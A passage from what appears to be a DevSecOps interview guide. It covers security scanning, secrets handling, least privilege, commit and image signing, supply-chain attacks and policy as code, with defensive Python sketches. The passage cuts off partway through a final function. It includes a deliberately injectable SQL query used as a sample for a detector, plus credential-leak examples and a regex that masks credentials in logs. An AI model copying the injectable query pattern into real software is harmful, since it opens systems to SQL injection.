  - Strengths: Finds real, exploitable vulnerabilities (low false positive rate). Tests the actual deployed configuration (CORS headers, TLS settings, authentication flows). Finds runtime issues that SAST can’t see.
  - Weaknesses: Can’t pinpoint the vulnerable line of code. Requires a running application (later in pipeline). Slow (crawling + testing takes 15-60 minutes). Can’t test code paths that aren’t reachable through the UI/API.
- “How do you handle SAST false positives that flood the developer with noise?” Tune the rules. Start with a small, high-confidence rule set and expand gradually. Suppress specific findings with inline comments (`// #nosec` in gosec, `//nolint:gosec` in golangci-lint) after security team review. Use SonarQube’s “Won’t Fix” status to exclude validated false positives. Track the false positive rate: if it’s above 30%, developers will ignore all findings. Custom Semgrep rules tailored to your codebase patterns produce far fewer false positives than generic rule sets.
- “What’s IAST and how does it differ?” IAST (Interactive Application Security Testing) instruments the running application and observes actual code execution during tests. It combines SAST’s code visibility with DAST’s runtime context. When your integration tests hit an endpoint, IAST tracks the request through the code and can say “this SQL query at line 47 was built using unsanitized input from the HTTP request.” Tools: Contrast Security, Hdiv. Advantage: low false positive rate + exact code location. Disadvantage: requires agents/instrumentation in the application runtime, which can add latency and complexity.
- “Where does DAST fit in the CI/CD pipeline?” After deployment to a test/staging environment. DAST needs a running, accessible application. Run a fast DAST scan (5-10 minutes, limited scope) in the staging pipeline as a gate. Run a full DAST scan (30-60 minutes, full crawl) nightly or weekly. Never run DAST against production without explicit approval — attack payloads can create garbage data, trigger alerts, or cause instability. Some teams run DAST in a dedicated “security testing” environment that mirrors production.
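The “parse to an AST, apply a pattern rule” step of SAST can be shown with a toy rule built on Python’s standard `ast` module. This is a deliberately naive sketch, not how SonarQube, Semgrep, or CodeQL implement their rules, and it performs no taint analysis; the scanned sample and the rule itself are assumptions for illustration.

```python
import ast

SQL_PREFIXES = ("select ", "insert ", "update ", "delete ")

def find_sql_concatenation(source):
    """Return line numbers where a SQL-looking string literal is joined with `+`
    to something that is not a literal (a possible injection point)."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add)):
            continue
        left, right = node.left, node.right
        looks_like_sql = (
            isinstance(left, ast.Constant)
            and isinstance(left.value, str)
            and left.value.lstrip().lower().startswith(SQL_PREFIXES)
        )
        if looks_like_sql and not isinstance(right, ast.Constant):
            findings.append(node.lineno)
    return sorted(findings)

# Hypothetical code under analysis; it is parsed, never executed.
SAMPLE = '''
def get_user(cursor, user_input):
    query = "SELECT * FROM users WHERE id = " + user_input
    cursor.execute(query)

def get_user_safe(cursor, user_input):
    cursor.execute("SELECT * FROM users WHERE id = %s", (user_input,))
'''

flagged_lines = find_sql_concatenation(SAMPLE)
print(flagged_lines)
```

The rule flags the concatenation and ignores the parameterized query, but it would also flag a concatenation with a trusted constant held in a variable, which is the kind of context-blind false positive described under SAST weaknesses.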
32. Dependency Scanning (SCA)
- Parse dependency manifests: `package-lock.json`, `go.sum`, `requirements.txt`, `pom.xml`, `Gemfile.lock`.
- Build a dependency tree (including transitive dependencies, i.e. your dependency’s dependencies).
- Match each dependency version against CVE databases.
- Report: CVE ID, severity (CVSS score), affected version range, fixed version, exploit availability.
- Block on Critical/High in CI. A PR that introduces a dependency with a known critical CVE should not merge.
- Alert on Medium. Create tickets, fix within SLA (e.g., 30 days for Medium, 7 days for High, 24 hours for Critical with known exploit).
- Auto-update: Dependabot/Renovate creates PRs automatically when new versions are available. Auto-merge patch updates that pass tests. Require manual review for major version updates.
- License compliance: SCA tools also scan licenses. Your legal team might prohibit AGPL dependencies in a commercial product. Flag license violations in CI.
- “A critical CVE is found in a transitive dependency 4 levels deep. How do you fix it?” First, check if a newer version of your direct dependency includes the fix (often it does: `npm audit fix` or `npm update` resolves many transitive issues). If not, use override/resolution mechanisms: `overrides` in `package.json` (npm 8.3+), `resolutions` in Yarn, or Maven `dependencyManagement` to force the patched version. If no patched version exists, evaluate: is the vulnerability actually exploitable in your usage? (Many CVEs require specific conditions.) If yes and no fix exists, consider replacing the dependency or implementing a workaround (input validation that blocks the exploit vector).
- “How do you handle the alert fatigue from hundreds of dependency vulnerabilities?” Prioritize by: (1) exploitability: is there a known exploit in the wild? (EPSS score), (2) reachability: does your code actually call the vulnerable function? (Snyk’s reachability analysis), (3) exposure: is the vulnerable component internet-facing or internal-only? A critical CVE in a dev-only testing utility has lower real-world risk than a medium CVE in your authentication library. Group related vulnerabilities (10 CVEs in the same library = 1 action item: upgrade the library). Set realistic SLAs and track compliance rather than trying to fix everything immediately.
- “What’s the difference between Dependabot and Renovate?” Dependabot: GitHub-native, simpler configuration, creates individual PRs per dependency update, limited customization. Renovate: More powerful grouping (batch all patch updates into one PR), scheduling (update only on Mondays), auto-merge rules (auto-merge patch updates with passing tests), works on any platform (GitHub, GitLab, Bitbucket). For teams with many repos and dependencies, Renovate’s grouping alone saves hours of PR review. Dependabot is better for small projects that want zero configuration.
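The scan-then-gate flow in this section (match resolved versions against advisories, block on Critical/High, alert on the rest) can be sketched as follows. The advisory entries, package names, and CVE identifiers are placeholders, and treating every version below `fixed_in` as affected is a simplifying assumption; real advisories carry explicit affected ranges.

```python
def parse_version(text):
    """Parse a plain dotted version such as '2.4.1' into a comparable tuple."""
    return tuple(int(part) for part in text.split("."))

# Placeholder advisory data, not real CVEs.
ADVISORIES = [
    {"id": "CVE-0000-0001", "package": "examplelib", "fixed_in": "2.4.1", "severity": "CRITICAL"},
    {"id": "CVE-0000-0002", "package": "otherlib", "fixed_in": "1.0.5", "severity": "MEDIUM"},
]

def scan(dependencies, advisories):
    """Return advisories that apply to the resolved dependency versions."""
    findings = []
    for name, version in dependencies.items():
        for advisory in advisories:
            affected = parse_version(version) < parse_version(advisory["fixed_in"])
            if advisory["package"] == name and affected:
                findings.append({**advisory, "installed": version})
    return findings

def ci_gate(findings):
    """Block the build on Critical/High findings; anything else only alerts."""
    blocking = [f["id"] for f in findings if f["severity"] in {"CRITICAL", "HIGH"}]
    return ("fail", blocking) if blocking else ("pass", [])

# Hypothetical resolved dependency tree, direct and transitive flattened together.
resolved = {"examplelib": "2.3.9", "otherlib": "1.0.2", "safelib": "3.0.0"}
findings = scan(resolved, ADVISORIES)
gate_before = ci_gate(findings)
gate_after = ci_gate(scan({**resolved, "examplelib": "2.4.1"}, ADVISORIES))
```

After upgrading `examplelib` to the fixed version, only the Medium finding remains, so the gate passes and the finding is left to the ticket SLA.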
33. Container Scanning
`ubuntu:22.04` base image ships with 100+ packages, any of which might have CVEs.
What gets scanned:
- OS packages: `apt`, `apk`, `yum` packages in the image. A vulnerable `openssl` or `glibc` can be exploited regardless of your application code.
- Application dependencies: Some scanners also check installed language packages (`pip`, `npm`, `gem` packages in the image layers).
- Misconfigurations: Running as root, exposed ports, missing health checks, insecure mount points. Tools like Dockle check Dockerfile best practices.
- Secrets: Accidentally baked-in secrets (API keys in environment variables, credential files in image layers). Even if you delete a file in a later layer, it exists in the earlier layer and can be extracted.
- CI pipeline: Scan after building the image, before pushing to registry. Block on Critical/High findings.
- Registry: Scan on push and periodically (new CVEs are published daily). ECR and GCR have built-in scheduled scanning.
- Runtime: Continuously monitor running containers for newly discovered vulnerabilities. A container that was clean when deployed might have a new critical CVE discovered a week later.
- Use minimal base images: `alpine` (5MB, ~50 packages) vs `ubuntu` (77MB, ~300 packages). Fewer packages = fewer potential vulnerabilities.
- Use distroless images (Google): only your application binary, no shell, no package manager. Attack surface: near zero. You can’t `exec` into the container because there’s no shell.
- Multi-stage builds: build stage has compilers and tools, runtime stage has only the binary and minimal dependencies.
`node:18` is based on Debian and ships with hundreds of packages, many with known CVEs.

Follow-up:
- “A scan finds 200 vulnerabilities in your base image. How do you prioritize?” Filter by fixability first: how many have a patched version available? Of those, prioritize by severity (Critical > High), exploitability (is there a known exploit?), and relevance (is the vulnerable package actually used at runtime?). Quick wins: update the base image to the latest patch version (`alpine:3.18.0` to `alpine:3.18.4`). For vulnerabilities without fixes, assess risk: is the vulnerable function reachable? Is the container network-isolated? Accept the risk with documentation, or switch to an alternative base image.
- “How do you prevent secrets from being baked into Docker images?” Use multi-stage builds: copy secrets into the build stage (for accessing private registries during `npm install`), then don’t copy them to the runtime stage. Use Docker BuildKit secrets (`--mount=type=secret,id=npmrc`), which are available during build but never persisted in image layers. Never use `ENV` for secrets (they’re visible in image metadata). Never `COPY .env` into the image. Use `.dockerignore` to exclude `.env`, `.git`, and credential files. Scan images for secrets using tools like Trivy’s secret scanning or ggshield.
- “Should you scan third-party images you pull from Docker Hub?” Absolutely. Third-party images are untrusted code running in your infrastructure. Scan them the same as your own images. Better: maintain an approved base image registry (Harbor as a proxy/cache for Docker Hub with scanning enabled). Only images that pass scanning are available to developers. Some organizations maintain their own hardened base images, rebuilt weekly from upstream sources with vulnerability patches applied.
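The "block on Critical/High" gate and the "filter by fixability first" advice can be combined in a small CI step. The sketch below assumes a simplified, hypothetical report format (a JSON list with `id`, `package`, `severity`, and `fixed_version` keys); real scanners each have their own schema, so the field names would need adapting.

```python
import json

BLOCKING_SEVERITIES = {"CRITICAL", "HIGH"}


def triage(report_json: str) -> tuple[list[dict], list[dict]]:
    """Split serious findings into (blockers, needs_review).

    blockers:     Critical/High findings that already have a patched version.
    needs_review: Critical/High findings with no fix yet (assess risk manually).
    """
    findings = json.loads(report_json)
    serious = [f for f in findings if f["severity"].upper() in BLOCKING_SEVERITIES]
    blockers = [f for f in serious if f.get("fixed_version")]
    needs_review = [f for f in serious if not f.get("fixed_version")]
    return blockers, needs_review


# Hypothetical scan output, for illustration only.
sample_report = json.dumps([
    {"id": "VULN-1", "package": "openssl", "severity": "CRITICAL", "fixed_version": "3.0.13"},
    {"id": "VULN-2", "package": "zlib", "severity": "HIGH", "fixed_version": None},
    {"id": "VULN-3", "package": "busybox", "severity": "LOW", "fixed_version": "1.36.1"},
])

blockers, needs_review = triage(sample_report)
exit_code = 1 if blockers else 0  # a CI wrapper would pass this to sys.exit()
print("blockers:", [f["id"] for f in blockers])
print("needs review:", [f["id"] for f in needs_review])
print("exit code:", exit_code)
```

Separating fixable blockers from unfixable findings keeps the gate actionable: the build fails only when an upgrade would resolve the problem, while the rest goes to a documented risk review.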
34. Secrets Management in CI
- Never commit secrets to Git. Not even in “private” repos. Git history is forever: a secret committed and immediately removed is still in `git log`. Use `.gitignore` for `.env` files. Use pre-commit hooks (gitleaks, detect-secrets) to catch accidental commits.
- Use platform-native secret storage. GitHub Actions: Encrypted Secrets (repo, environment, or organization level). GitLab CI: CI/CD Variables (masked, protected). Jenkins: Credentials Plugin. These are encrypted at rest and injected as environment variables at runtime.
- Use a proper secrets manager for production. HashiCorp Vault, AWS Secrets Manager, GCP Secret Manager, Azure Key Vault. These provide: dynamic secrets (generate a database credential that expires in 1 hour), rotation, audit logs, fine-grained access control.
- Mask secrets in logs. CI platforms auto-mask secrets they know about, but custom secrets or secrets derived from operations might leak. Never `echo $SECRET` in a pipeline. Be careful with debug flags that dump environment variables.
- Scope secrets narrowly. Don’t give every pipeline access to production secrets. Use environment-level secrets (only the `production` environment has the prod database password, and deployments to `production` require manual approval). Use the principle of least privilege: the linting stage doesn’t need the deploy key.
- Error messages that include connection strings: `Failed to connect to postgres://admin:p4ssw0rd@prod-db:5432`.
- Dependency installation logs that echo auth tokens: `npm install --registry https://token:abc123@registry.npmjs.org`.
- Terraform state files that contain resource attributes (including passwords) stored in an unencrypted S3 bucket.
- Docker build args (`ARG`) visible in image history (`docker history`).
- “A secret was accidentally committed to Git. What do you do?” Immediate action: rotate the secret NOW (generate new credentials, revoke old ones). Don’t wait to clean Git history; assume the secret is compromised. Then use `git filter-branch` or BFG Repo Cleaner to remove the secret from Git history, and force-push (coordinate with the team). Check audit logs: was the secret accessed during the exposure window? Check GitHub’s secret scanning alerts to see whether it was detected by partners (GitHub automatically revokes some leaked tokens). Post-incident: add pre-commit hooks to prevent recurrence.
- “How do you handle secret rotation in a zero-downtime system?” Use dynamic secrets (Vault generates a new database credential per deployment, valid for 24 hours; no rotation is needed because credentials are ephemeral). For static secrets: rotate by deploying a new version that picks up the new secret, while the old secret remains valid during the transition window. For database passwords: create a second user with the new password, deploy the app pointing to the new user, then disable the old user. Vault’s database engine automates this. Never rotate by updating a secret and restarting all instances simultaneously; that’s a self-inflicted outage.
- “How do you audit who accessed which secret and when?” Vault provides detailed audit logs (who authenticated, what secret path they read, when, from which IP). AWS Secrets Manager integrates with CloudTrail. GitHub Actions logs which workflows accessed which secrets (though not the values). For compliance (SOC 2, HIPAA), you need these audit logs stored immutably (append-only log, shipped to a separate account). Set up alerts: if a production secret is accessed from an unexpected IP or at an unusual time, investigate.
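The leak patterns listed in this section (connection strings in error messages, tokens embedded in registry URLs) can be caught by a log filter that redacts credentials before lines are printed. This is a minimal sketch, assuming logs pass through a function you control; the `redact` helper and its regular expression are illustrative and will not catch every secret format.

```python
import re

# Matches the "user:password@" part of URLs such as scheme://user:password@host
URL_CREDENTIALS = re.compile(
    r"(?P<scheme>[a-zA-Z][a-zA-Z0-9+.-]*://)[^/\s:@]+:[^/\s@]+@"
)


def redact(line: str, known_secrets: tuple[str, ...] = ()) -> str:
    """Mask URL-embedded credentials and any explicitly known secret values."""
    line = URL_CREDENTIALS.sub(r"\g<scheme>***:***@", line)
    for secret in known_secrets:
        if secret:  # never replace the empty string
            line = line.replace(secret, "***")
    return line


print(redact("Failed to connect to postgres://admin:p4ssw0rd@prod-db:5432"))
print(redact("npm install --registry https://token:abc123@registry.npmjs.org"))
print(redact("deploy key is s3cr3t-value", known_secrets=("s3cr3t-value",)))
```

Redaction is a last line of defense, not a substitute for keeping secrets out of command lines and error messages in the first place.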
35. Least Privilege
- CI runner has `AdministratorAccess` IAM policy on AWS. “It needed S3 access, so we gave it admin.” Now a compromised pipeline can delete your entire AWS account.
- Deploy key has read/write access to all repositories. “It needed to clone one repo.” Now a compromised pipeline can push malicious code to any repo.
- Terraform runs with a role that can create any resource. “It needed to create EC2 instances.” Now it can create IAM users, open security groups, or launch Bitcoin miners.
- Scope IAM roles per pipeline stage. The “lint” stage needs zero AWS permissions. The “build” stage needs ECR push. The “deploy” stage needs EKS access. Use OIDC federation (GitHub Actions OIDC to AWS, GitLab CI to AWS) for short-lived credentials instead of long-lived access keys.
- Use separate roles per environment. The staging deploy role can’t touch production resources. The production deploy role has additional constraints (e.g., can only update existing deployments, not create new ones).
- Time-bound access. AWS STS temporary credentials (1-hour TTL). Vault dynamic secrets. Never use permanent access keys in CI.
- Restrict network access. Self-hosted runners in a dedicated VPC with security groups. Only allow outbound access to required endpoints (registry, artifact store, deploy target). Block unnecessary internet access.
- “How do you implement OIDC between GitHub Actions and AWS?” Configure an OIDC identity provider in AWS IAM pointing to GitHub’s OIDC endpoint. Create an IAM role with a trust policy that specifies which GitHub org, repo, and branch can assume it. In the workflow, grant the job the `id-token: write` permission and use `aws-actions/configure-aws-credentials` with `role-to-assume`. No long-lived credentials are stored anywhere: GitHub mints a short-lived JWT, and AWS exchanges it for temporary STS credentials. The trust policy can restrict access: only the `main` branch can assume the production deploy role, while feature branches can only assume the staging role.
- “A CI pipeline needs to access 5 AWS services. How do you scope the permissions?” Create a custom IAM policy with the minimum actions needed. Use IAM Access Analyzer to generate a least-privilege policy from CloudTrail logs (it shows what the role actually used vs. what it has permission to do). Start with the minimum you think is needed, let the pipeline fail on permission errors, then add the specific missing permission. This is more secure than starting broad and never tightening. Document each permission with a comment explaining why it’s needed.
- “How do you detect and remediate over-privileged CI identities?” AWS IAM Access Analyzer reports unused permissions. Run it monthly: if the CI role has S3 delete permission but never used it in 90 days, remove it. Use Service Control Policies (SCPs) as a guardrail: even if a CI role has `iam:*`, the SCP prevents it from creating new IAM users. Implement CI-specific AWS accounts with restrictive SCPs as a safety net. Alert on unusual API calls from CI identities (creating new IAM users, modifying security groups, accessing KMS keys they’ve never used).
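The trust policy mentioned in the OIDC answer can be generated rather than hand-written, which makes it easy to produce one role per repo and branch. A minimal sketch follows; the helper name, account ID, org, and repo are hypothetical, and the `sub` format shown is the one used for branch-triggered workflows (environment-scoped jobs use a different `sub` value).

```python
import json

GITHUB_OIDC_PROVIDER = "token.actions.githubusercontent.com"


def github_oidc_trust_policy(account_id: str, org: str, repo: str, branch: str) -> dict:
    """Build an IAM trust policy that only one repo + branch can assume."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Effect": "Allow",
                "Principal": {
                    "Federated": (
                        f"arn:aws:iam::{account_id}:oidc-provider/{GITHUB_OIDC_PROVIDER}"
                    )
                },
                "Action": "sts:AssumeRoleWithWebIdentity",
                "Condition": {
                    "StringEquals": {
                        # Audience set by the official AWS credentials action.
                        f"{GITHUB_OIDC_PROVIDER}:aud": "sts.amazonaws.com",
                        # Restrict to a single repository and branch.
                        f"{GITHUB_OIDC_PROVIDER}:sub": (
                            f"repo:{org}/{repo}:ref:refs/heads/{branch}"
                        ),
                    }
                },
            }
        ],
    }


# Hypothetical values for illustration.
policy = github_oidc_trust_policy("123456789012", "example-org", "example-app", "main")
print(json.dumps(policy, indent=2))
```

Using `StringEquals` on `sub` (rather than a wildcard match) is the stricter choice: a production role built this way cannot be assumed from a feature branch.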
36. Signed Commits
Anyone can run `git config user.email "ceo@company.com"` and create commits that appear to be from the CEO.

Why it matters:
- Supply chain attacks: An attacker who compromises a developer’s account could push malicious code. If commits are unsigned or signed with a different key, the review process can catch it.
- Audit compliance: Regulated industries require traceability of who made which change. Git’s `author` field is self-reported. A GPG signature provides cryptographic proof.
- Branch protection: GitHub can require signed commits on protected branches. Unsigned commits can’t be merged to `main`.
- Developer generates a GPG key pair. Registers the public key on GitHub/GitLab.
- `git config --global commit.gpgSign true` enables auto-signing.
- Each commit includes a GPG signature that can be verified with the developer’s public key.
- `git log --show-signature` shows verification status. GitHub shows a green “Verified” badge.
- Start with awareness, not enforcement. Enable “Vigilant mode” on GitHub (shows “Unverified” on unsigned commits) so developers see the gap.
- Provide setup documentation and scripted configuration.
- Enforce signing on `main` branch via branch protection rules.
- Handle service accounts and bots: they need their own signing keys (GitHub Apps can sign with their built-in identity).
- “What about CI/CD bots that need to create commits (version bumps, changelog updates)?” Use a GitHub App or a dedicated service account with its own GPG/SSH key. GitHub Apps can sign commits with the app’s identity (`github-actions[bot]`). Never share a human developer’s signing key with a CI system. Dependabot and Renovate create commits signed with their own identities. The principle: every commit should be traceable to either a human or a specific, auditable automation identity.
- “A developer’s GPG key is compromised. What do you do?” Revoke the key on GitHub (remove it from the developer’s profile). Revoke it on the GPG keyservers. Generate a new key pair. Audit recent commits signed with the compromised key: were any unauthorized changes made? Old commits signed with the revoked key will show as “Unverified” in the future, which is the correct behavior (we can no longer trust that key). This is similar to certificate revocation in TLS.
- “Is commit signing worth the overhead for a small team?” For a 5-person startup: probably not enforced, but it’s good practice. The real value comes when you have many contributors, open-source projects, or compliance requirements. However, SSH signing with `git config --global gpg.format ssh` is so easy to set up that there’s little reason not to enable it. The bigger question is: does your threat model include commit impersonation? For open-source projects accepting external contributions, yes. For a private repo with 3 trusted developers, it’s lower priority.
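Before enforcing signing, it helps to measure the gap. The sketch below assumes you have captured the output of `git log --format='%h %G?'`, where `%G?` prints a one-letter signature status (`G` good, `B` bad, `N` no signature, plus several "good but untrusted/expired/revoked" variants). The function name and sample hashes are made up for the example.

```python
# Only a good signature ("G") counts as verified in this sketch; statuses such as
# U (unknown validity), X/Y (expired), R (revoked key), E (cannot check),
# B (bad) and N (none) are all flagged.
VERIFIED_STATUSES = {"G"}


def commits_needing_attention(log_output: str) -> list[str]:
    """Return abbreviated hashes of commits without a verified signature."""
    flagged = []
    for line in log_output.splitlines():
        if not line.strip():
            continue
        commit, status = line.split()
        if status not in VERIFIED_STATUSES:
            flagged.append(commit)
    return flagged


# Sample text in the shape produced by: git log --format='%h %G?'
sample_log = "1111111 G\n2222222 N\n3333333 B\n4444444 G\n"
print(commits_needing_attention(sample_log))
```

Running a report like this on `main` for a few weeks supports the "awareness before enforcement" rollout described above.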
37. Supply Chain Attack
- SolarWinds (2020): Attackers compromised the build system and injected malware into a signed software update. 18,000 organizations installed the backdoored update, including US government agencies. Estimated cost: billions.
- Log4Shell (2021): A vulnerability in Log4j (used by ~35% of Java applications). Not an intentional attack, but demonstrated how a single transitive dependency can expose millions of systems.
- event-stream (2018): npm package maintainer transferred ownership to an unknown developer who injected cryptocurrency-stealing code. 2M weekly downloads.
- ua-parser-js (2021): Popular npm package (8M weekly downloads) was hijacked via compromised maintainer credentials. Malicious version included cryptocurrency miners and credential stealers.
- codecov (2021): Attackers modified the Bash uploader script used in CI pipelines. Every CI pipeline that ran the compromised script leaked environment variables (including secrets) to the attacker.
- Dependency poisoning: Compromise a popular package (typosquatting, account takeover, or malicious contribution).
- Build system compromise: Inject code during the build process (SolarWinds, Codecov).
- Infrastructure compromise: Compromise the CI/CD runner, registry, or deployment target.
- Distribution compromise: Modify artifacts after build but before deployment (registry poisoning).
- Lockfiles: `package-lock.json`, `go.sum`, `Pipfile.lock`. Pin exact versions AND hashes. `npm ci` (not `npm install`) respects the lockfile strictly.
- Vendor dependencies: Copy dependencies into your repo so you’re not affected by upstream deletions or modifications (`go mod vendor`, npm `bundleDependencies`).
- SLSA framework: Supply-chain Levels for Software Artifacts. Level 1: build provenance exists. Level 2: provenance is tamper-resistant. Level 3: build runs on hardened, isolated infrastructure. Google, GitHub Actions, and others provide SLSA provenance.
- Dependency review: Review new dependencies before adding them. Check: maintainer reputation, download count, last update date, security audit history. Don’t add a 10-line npm package from an anonymous maintainer when you could write 10 lines of code.
- Reproducible builds: Anyone can rebuild the same source and get the identical artifact. If the official artifact doesn’t match a reproducible build, it was tampered with.
- “How does SLSA protect against the SolarWinds-type attack?” SLSA Level 3 requires that the build runs on hardened, isolated infrastructure that the project developers cannot influence. The build system generates a provenance attestation (signed metadata proving what source code was built, on what infrastructure, with what configuration). Consumers verify the provenance before using the artifact. In the SolarWinds case, the attacker modified the build process — with SLSA Level 3, the build infrastructure would be tamper-resistant and the provenance would show if the build process was modified.
- “A developer wants to add a new npm package with 50 weekly downloads and 1 contributor. How do you evaluate the risk?” Red flags: low download count, single maintainer, no organizational backing, no security audits, recently published. Evaluate: can we write the functionality ourselves? (often yes for small utilities). If we must use it, can we vendor it (copy the source into our repo and audit it)? If we depend on it from npm, can we pin to a specific version hash and set up alerts for any new versions? The broader principle: every dependency is an attack surface. The cost of adding a dependency includes the ongoing cost of monitoring it.
- “How do you verify the integrity of CI/CD tools themselves (GitHub Actions, Docker, kubectl)?” Pin Action versions to commit SHAs, not tags (`uses: actions/checkout@a1b2c3d`, abbreviated here; use the full commit SHA rather than `@v3`, because tags can be moved). Verify checksums of downloaded tools (download the file with `curl`, then check it against the published checksum with `sha256sum -c`). Use official package repositories with signature verification. For critical tools, use signed releases (Docker releases are GPG-signed, kubectl releases include checksums). Store tool versions in lockfiles or pinned configurations so they don’t silently update.
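The "pin to commit SHAs, not tags" rule is easy to check automatically. The sketch below scans workflow text for `uses:` references whose ref is not a full 40-character hex SHA. It is a plain-text heuristic (no YAML parsing), the function name and example action are hypothetical, and `docker://` references would need separate handling.

```python
import re

# Captures "owner/repo[/path]@ref" from lines such as "- uses: actions/checkout@v3".
USES = re.compile(r"^\s*-?\s*uses:\s*(?P<action>[^@\s]+)@(?P<ref>\S+)", re.MULTILINE)
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")


def unpinned_actions(workflow_text: str) -> list[str]:
    """Return action references that use a tag or branch instead of a full SHA."""
    return [
        f"{m['action']}@{m['ref']}"
        for m in USES.finditer(workflow_text)
        if not FULL_SHA.match(m["ref"])
    ]


workflow = """
steps:
  - uses: actions/checkout@v3
  - uses: example-org/example-action@0123456789abcdef0123456789abcdef01234567
  - uses: ./local-action
"""
print(unpinned_actions(workflow))
```

Local actions (`./local-action`) have no `@ref` and are skipped, since they are versioned with the repository itself.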
38. Image Signing
- CI pipeline builds a Docker image and pushes it to a registry.
- `cosign sign --key cosign.key myregistry/myapp@sha256:abc123` signs the image digest.
- The signature is stored alongside the image in the registry (as an OCI artifact).
- At deployment time, the admission controller (Kyverno, OPA Gatekeeper, Connaisseur) verifies the signature before allowing the image to run.
- If the image is unsigned or signed with an untrusted key, the pod is rejected.
- Registry compromise: If an attacker pushes a malicious image to your registry with the same tag, the admission controller rejects it because it’s unsigned.
- CI pipeline compromise: If an attacker modifies the pipeline to build a different image, the image is signed with a different identity (or not signed at all). The admission controller catches it.
- Compliance: SLSA Level 2+ requires tamper-resistant provenance. Image signing + attestation provides this.
- “How do you enforce that only signed images run in your Kubernetes cluster?” Deploy an admission webhook (Kyverno or OPA Gatekeeper) with a policy that rejects pods with unsigned or unverified images. Kyverno policy example: a `verifyImages` rule that requires images matching `myregistry/*` to have a valid Cosign signature from a specific key or OIDC identity. Test the policy in `Audit` mode first (logs violations without blocking), then switch to `Enforce` mode. Exempt system namespaces (`kube-system`) that run upstream Kubernetes images.
- “What’s the difference between signing with Cosign vs Notary/Docker Content Trust?” Notary (Docker Content Trust, DCT) is the older approach. It uses The Update Framework (TUF) for key management. It’s complex to set up, has limited adoption outside Docker Hub, and requires a separate Notary server. Cosign (Sigstore) is the modern approach: simpler CLI, works with any OCI registry, supports keyless signing via OIDC, has a transparency log (Rekor) for audit. Cosign is now the de facto standard for container signing, endorsed by the Linux Foundation, CNCF, and used by Kubernetes itself.
- “How do you handle image signing in a multi-team organization?” Each team has its own signing identity (OIDC-based: the team’s CI workflow has a unique `sub` claim). The admission controller policy specifies which signing identities are trusted for which namespaces. Team A’s images can only run in Team A’s namespace. A central platform team manages the signing infrastructure and admission policies. For shared base images, the platform team signs them and all teams’ policies trust the platform team’s identity.
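The multi-team rule ("Team A's images only run in Team A's namespace, and everyone trusts the platform team") boils down to a lookup from namespace to trusted signer identities. The sketch below models only that decision logic in plain Python; it is not a Kyverno or Gatekeeper policy, and the namespaces and identity strings are hypothetical.

```python
from fnmatch import fnmatchcase
from typing import Optional

# Hypothetical policy: namespace -> signer identity patterns trusted there.
PLATFORM_IDENTITY = "repo:example-org/platform-base-images"
TRUSTED_SIGNERS = {
    "team-a": ["repo:example-org/team-a-*", PLATFORM_IDENTITY],
    "team-b": ["repo:example-org/team-b-*", PLATFORM_IDENTITY],
}
EXEMPT_NAMESPACES = {"kube-system"}  # upstream Kubernetes images


def admit(namespace: str, signer: Optional[str]) -> bool:
    """Decide whether an image signed by `signer` may run in `namespace`.

    `signer` is None for an unsigned image.
    """
    if namespace in EXEMPT_NAMESPACES:
        return True
    if signer is None:
        return False
    patterns = TRUSTED_SIGNERS.get(namespace, [])  # unknown namespace: deny
    return any(fnmatchcase(signer, pattern) for pattern in patterns)


print(admit("team-a", "repo:example-org/team-a-api"))   # own team
print(admit("team-b", "repo:example-org/team-a-api"))   # other team's signer
print(admit("team-b", PLATFORM_IDENTITY))               # shared base image
print(admit("team-a", None))                            # unsigned image
```

Defaulting to deny for namespaces missing from the policy mirrors how an enforcing admission controller should behave: a new namespace gets no trusted signers until someone adds them explicitly.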
39. Compliance as Code
OPA policy: `deny[msg] if input.resource.aws_s3_bucket.acl == "public-read"` (automatically blocked in CI).

Tools:
- OPA (Open Policy Agent): General-purpose policy engine. Rego language. Used for Kubernetes admission (Gatekeeper), Terraform (Conftest), API authorization. Write policies like “no container can run as root,” “all pods must have resource limits,” “no security group can allow 0.0.0.0/0 on port 22.”
- Kyverno: Kubernetes-native policy engine. Policies written as Kubernetes YAML (not Rego). More accessible for Kubernetes-focused teams. Supports mutation (auto-add labels), validation (reject non-compliant resources), and generation (auto-create NetworkPolicies).
- Checkov / tfsec / Terrascan: Terraform-specific policy scanners. Check IaC for security misconfigurations before provisioning. “This RDS instance doesn’t have encryption at rest” is blocked before it’s created.
- Sentinel (HashiCorp): Policy engine for Terraform Cloud/Enterprise. Integrates into the `terraform plan` step. “This change would add more than 5 public-facing resources, so require VP approval.”
- All Docker images must use a specific base image from the approved registry.
- All Kubernetes pods must have CPU/memory limits set.
- No IAM policies can use `*` as a resource.
- All RDS instances must have encryption at rest and automated backups enabled.
- All S3 buckets must have versioning and server-side encryption.
- No deployment can happen without a passing security scan.
- Security/compliance team writes policies in OPA/Kyverno.
- Policies are version-controlled, tested (with unit tests!), and reviewed like any other code.
- Policies run as CI checks on every PR that modifies infrastructure or Kubernetes manifests.
- Violations produce clear, actionable error messages (not just “denied” — explain why and how to fix).
- Emergency exceptions are tracked: “This resource was exempted from policy X because of reason Y, approved by Z, expires on date W.”
- “How do you test compliance policies themselves?” Write unit tests for policies. OPA has a built-in test framework. Create test fixtures: a compliant resource (should pass), a non-compliant resource (should fail), and an edge case (boundary condition). Run policy tests in CI when policies change. This prevents a policy update from accidentally blocking all deployments. At one company, an untested policy change blocked every pod from deploying because the Rego logic had a typo.
- “How do you handle exceptions to compliance policies?” Use annotations or labels to mark approved exceptions. Example: a Kyverno policy that requires resource limits can be bypassed with a specific annotation (`compliance.company.com/exception: JIRA-1234`). The annotation references an approved exception ticket with an expiration date. A separate report tracks all active exceptions and their expiration. Expired exceptions are flagged. This provides both automation and audit trail.
- “How does compliance as code interact with SOC 2 audits?” SOC 2 requires evidence that controls are in place and operating effectively. Compliance as code provides: (1) the policy definitions (evidence the control exists), (2) CI logs showing the policy ran on every deployment (evidence the control operates), (3) audit logs showing no exceptions were made outside the approved process (evidence the control is effective). This makes SOC 2 audits dramatically faster: instead of gathering screenshots and emails for weeks, you point the auditor at the Git repo of policies and the CI logs.
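The ideas in this section (a policy, an expiring exception, and fixtures that test the policy itself) fit in one small example. It is written in Python rather than Rego or Kyverno YAML purely for illustration; the resource shape, the `exception` field, and the fixture names are assumptions, not the format of any real tool.

```python
from datetime import date


def violations(resources: list[dict], today: date) -> list[str]:
    """Return actionable messages for resources that break the S3 ACL policy."""
    problems = []
    for res in resources:
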